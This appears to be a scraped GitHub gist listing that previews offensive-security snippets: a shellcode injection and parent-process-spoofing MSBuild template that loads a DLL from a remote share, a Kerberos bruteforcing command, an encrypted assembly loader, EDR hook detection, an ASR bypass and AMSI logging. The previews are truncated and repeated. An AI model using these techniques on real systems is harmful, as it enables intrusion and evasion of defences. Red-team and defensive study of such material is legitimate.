Ceramicskate0 ceramicskate0

## gist:dec308e1d95c6ea090c61d31a4db6f89
{
		"SliverExtension" :{
			"prefix": "sliverext",
			"body": [ "{",
					"\"name\": \"$1\",",
					"\"version\": \"0.0.0\",",
					"\"command_name\": \"$2\",",
					"\"extension_author\": \"$3\",",
					"\"original_author\": \"$3\",",
					"\"repo_url\": \"N/A\",",

## rsrcDecryptAssembly.nim
import nimcrypto
import winim/clr except `[]`  # https://s3cur3th1ssh1t.github.io/Playing-with-OffensiveNim/  <-- thank you so much, 2 hours googling I almost went crazy

#[
    All credit goes to @byt3bl33d3r (OffensiveNim) and @s3cur3th1ssh1t

    nimble install winim nimcrypto zippy
    nim c -d:danger -d:strip --opt:size rsrcDecryptAssembly.nim

    slurp = "staticRead" will read the file and store it in the variable (.rdata) on compile time.

## hookdetector.vba
Private Declare PtrSafe Function GetModuleHandleA Lib "KERNEL32" (ByVal lpModuleName As String) As LongPtr
Private Declare PtrSafe Function GetProcAddress Lib "KERNEL32" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr
Private Declare PtrSafe Sub CopyMemory Lib "KERNEL32" Alias "RtlMoveMemory" (ByVal Destination As LongPtr, ByVal Source As LongPtr, ByVal Length As Long)

'VBA Macro that detects hooks made by EDRs
'PoC By Juan Manuel Fernandez (@TheXC3LL) based on a post from SpecterOps (https://posts.specterops.io/adventures-in-dynamic-evasion-1fe0bac57aa)


Public Function checkHook(ByVal target As String, hModule As LongPtr) As Integer
    Dim address As LongPtr

## CreateRemoteThreadDInvoke.cs
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;


namespace InjectionTest
{
    public class DELEGATES
    {

## msbuild_inline_task_parent_process_spoof.txt
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
            <Target Name="MyTarget">
                <SimpleTask MyProperty="My voice is my passport."
                MyCode='<base64 encoded x64 shellcode>'
		MyProcess='C:\Program Files\Internet Explorer\iexplore.exe'/>
            </Target>
        <UsingTask TaskName="SimpleTask" AssemblyFile="\\192.168.120.129\share\IEShims.dll" />
</Project>


## TestAssembly.cs
/*

================================ Compile as a .Net DLL ==============================
	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library /out:TestAssembly.dll TestAssembly.cs

*/

using System.Windows.Forms;

namespace TestNamespace

## kerberos_attacks_cheatsheet.md

      
              1 file
            
          
              377 forks
            
          
              5 comments
            
          
              1098 stars
            
          
                TarlogicSecurity
                / kerberos_attacks_cheatsheet.md
            
            
              Created
              May 14, 2019 13:33
            
              
                A cheatsheet with commands that can be used to perform kerberos attacks
              
          
    Kerberos cheatsheet

Bruteforcing

With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:

  
## ASR Rules Bypass.vba
' ASR rules bypass creating child processes
' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction
' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office
' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule

Sub ASR_blocked()
    Dim WSHShell As Object
    Set WSHShell = CreateObject("Wscript.Shell")
    WSHShell.Run "cmd.exe"
End Sub

## NiftyETWProviders.json
[
    {
        "ProviderGUID":  "72d164bf-fd64-4b2b-87a0-62dbcec9ae2a",
        "ProviderName":  "AccEventTool",
        "ProviderGroupGUID":  "4f50731a-89cf-4782-b3e0-dce8c90476ba",
        "AssociatedFilenames":  [
                                    "accevent.exe",
                                    "inspect.exe",
                                    "narrator.exe",
                                    "srh.dll"

## EnableAMSILogging.ps1
$AutoLoggerName = 'MyAMSILogger'
$AutoLoggerGuid = "{$((New-Guid).Guid)}"

New-AutologgerConfig -Name $AutoLoggerName -Guid $AutoLoggerGuid -Start Enabled
Add-EtwTraceProvider -AutologgerName $AutoLoggerName -Guid '{2A576B87-09A7-520E-C21A-4942F0271D67}' -Level 0xff -MatchAnyKeyword ([UInt64] (0x8000000000000001 -band ([UInt64]::MaxValue))) -Property 0x41
	{
	"SliverExtension" :{
	"prefix": "sliverext",
	"body": [ "{",
	"\"name\": \"$1\",",
	"\"version\": \"0.0.0\",",
	"\"command_name\": \"$2\",",
	"\"extension_author\": \"$3\",",
	"\"original_author\": \"$3\",",
	"\"repo_url\": \"N/A\",",
	import nimcrypto
	import winim/clr except `[]` # https://s3cur3th1ssh1t.github.io/Playing-with-OffensiveNim/ <-- thank you so much, 2 hours googling I almost went crazy

	#[
	All credit goes to @byt3bl33d3r (OffensiveNim) and @s3cur3th1ssh1t

	nimble install winim nimcrypto zippy
	nim c -d:danger -d:strip --opt:size rsrcDecryptAssembly.nim

	slurp = "staticRead" will read the file and store it in the variable (.rdata) on compile time.
	Private Declare PtrSafe Function GetModuleHandleA Lib "KERNEL32" (ByVal lpModuleName As String) As LongPtr
	Private Declare PtrSafe Function GetProcAddress Lib "KERNEL32" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr
	Private Declare PtrSafe Sub CopyMemory Lib "KERNEL32" Alias "RtlMoveMemory" (ByVal Destination As LongPtr, ByVal Source As LongPtr, ByVal Length As Long)

	'VBA Macro that detects hooks made by EDRs
	'PoC By Juan Manuel Fernandez (@TheXC3LL) based on a post from SpecterOps (https://posts.specterops.io/adventures-in-dynamic-evasion-1fe0bac57aa)


	Public Function checkHook(ByVal target As String, hModule As LongPtr) As Integer
	Dim address As LongPtr
	using System;
	using System.Diagnostics;
	using System.IO;
	using System.Runtime.InteropServices;


	namespace InjectionTest
	{
	public class DELEGATES
	{
	<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
	<Target Name="MyTarget">
	<SimpleTask MyProperty="My voice is my passport."
	MyCode='<base64 encoded x64 shellcode>'
	MyProcess='C:\Program Files\Internet Explorer\iexplore.exe'/>
	</Target>
	<UsingTask TaskName="SimpleTask" AssemblyFile="\\192.168.120.129\share\IEShims.dll" />
	</Project>
	/*

	================================ Compile as a .Net DLL ==============================
	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library /out:TestAssembly.dll TestAssembly.cs

	*/

	using System.Windows.Forms;

	namespace TestNamespace
	' ASR rules bypass creating child processes
	' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction
	' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office
	' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule

	Sub ASR_blocked()
	Dim WSHShell As Object
	Set WSHShell = CreateObject("Wscript.Shell")
	WSHShell.Run "cmd.exe"
	End Sub
	[
	{
	"ProviderGUID": "72d164bf-fd64-4b2b-87a0-62dbcec9ae2a",
	"ProviderName": "AccEventTool",
	"ProviderGroupGUID": "4f50731a-89cf-4782-b3e0-dce8c90476ba",
	"AssociatedFilenames": [
	"accevent.exe",
	"inspect.exe",
	"narrator.exe",
	"srh.dll"
	$AutoLoggerName = 'MyAMSILogger'
	$AutoLoggerGuid = "{$((New-Guid).Guid)}"

	New-AutologgerConfig -Name $AutoLoggerName -Guid $AutoLoggerGuid -Start Enabled
	Add-EtwTraceProvider -AutologgerName $AutoLoggerName -Guid '{2A576B87-09A7-520E-C21A-4942F0271D67}' -Level 0xff -MatchAnyKeyword ([UInt64] (0x8000000000000001 -band ([UInt64]::MaxValue))) -Property 0x41